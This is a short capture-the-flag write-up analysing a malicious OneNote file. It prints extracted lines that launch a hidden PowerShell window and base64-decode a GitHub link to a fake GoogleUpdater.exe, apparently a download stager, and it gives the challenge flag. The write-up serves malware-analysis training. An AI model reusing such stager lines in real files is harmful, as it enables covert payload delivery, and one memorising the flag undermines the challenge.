Note [REV]

2 minute read

Simple RE Challenge with a PowerShell malware theme.

📁 Challenge Description

Our company recently received a file claiming to contain flags for Sibersiaga 2023. When opening the file, all it showed was a blurred page with a “click here to view” button. So far, nothing has happened to our employees. Yet. Please investigate this one note at your earliest convenience. Disclaimer: -This contains real malware. Please proceed in a safe environment. -Do not upload files on VT or any malware sandbox to avoid fingerprint and bad labeling.

Password: infected

Flag format: sibersiaga{strings}

50 points, 10 solves

🚩 Solution

After unzipping the challenge file, we can start analyzing the file with file and strings. We found an encrypted PowerShell payload at the bottom context after using strings. Hence we can grep the payload out.

└─$ file One\
One data
└─$ strings One\ | grep 'powershell'
start powershell -WindowStyle Hidden -Command calc.exe
for /f %%i in ('powershell -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9naXRodWIuY29tL01vcmdhblRhcmF1bS9zaWx2ZXItc3Bvb24vcmF3L21haW4vR29vZ2xlVXBkYXRlci5leGU='))"') do set "humuhumu=%%i"

Surprisingly, there is another payload with a base64 encoded string aHR0cHM6Ly9naXRodWIuY29tL01vcmdhblRhcmF1bS9zaWx2ZXItc3Bvb24vcmF3L21haW4vR29vZ2xlVXBkYXRlci5leGU appeared after filtering out the challenge file.

Decode the string via CyberChef and we get a link navigating to a GitHub repository.


Go to the following link, we can see the repository contains a GoogleUpdater.exe.


Download the file, run strings, and try grep the flag out as we already know the flag format.

└─$ strings GoogleUpdate.exe| grep -i sibersiaga
echo sibersiaga{s4Tu_n0T4_m41w4Re} > nul

FLAG: sibersiaga{s4Tu_n0T4_m41w4Re}